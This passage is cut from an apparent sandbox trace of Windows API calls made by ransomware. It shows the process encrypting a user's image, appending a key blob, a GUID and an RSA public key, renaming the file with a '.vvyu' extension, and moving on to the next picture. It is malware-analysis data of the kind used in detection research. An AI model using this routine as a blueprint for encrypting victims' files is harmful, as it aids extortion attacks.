pdwDataLen=0x2f9fa54) returned 1 [0190.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.924] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.924] GetLastError () returned 0x0 [0190.924] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.924] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.924] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.924] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.924] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb210) returned 0x2af5168 [0190.925] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af34f8 [0190.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3540 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0190.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5f60 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0190.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.929] GetCurrentThreadId () returned 0x5d8 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae54a8 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.930] GetCurrentThreadId () returned 0x5d8 [0190.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0190.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0190.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f78 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fc0 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fd8 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f48 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f60 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0190.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0190.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3540 | out: hHeap=0x2c0000) returned 1 [0190.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.941] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xb200, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xb200, lpOverlapped=0x0) returned 1 [0190.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.942] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb205, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.942] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.944] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.944] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.944] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.944] CloseHandle (hObject=0x584) returned 1 [0190.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.946] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\Lv2Axv.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\lv2axv.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\Lv2Axv.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\lv2axv.jpg.vvyu")) returned 1 [0190.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.948] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.951] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1927de40, ftCreationTime.dwHighDateTime=0x1d89d74, ftLastAccessTime.dwLowDateTime=0x364f81b0, ftLastAccessTime.dwHighDateTime=0x1d8a177, ftLastWriteTime.dwLowDateTime=0x364f81b0, ftLastWriteTime.dwHighDateTime=0x1d8a177, nFileSizeHigh=0x0, nFileSizeLow=0x18586, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NCUi5d__zR45D.gif", cAlternateFileName="NCUI5D~1.GIF")) returned 1 [0190.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3540 [0190.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3540 | out: hHeap=0x2c0000) returned 1 [0190.952] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\NCUi5d__zR45D.gif") returned=".gif" [0190.952] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\NCUi5d__zR45D.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ncui5d__zr45d.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.952] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=99718) returned 1 [0190.952] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.956] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.956] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.958] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.958] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x18586, lpOverlapped=0x0) returned 1 [0190.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.960] RtlAllocateHeap 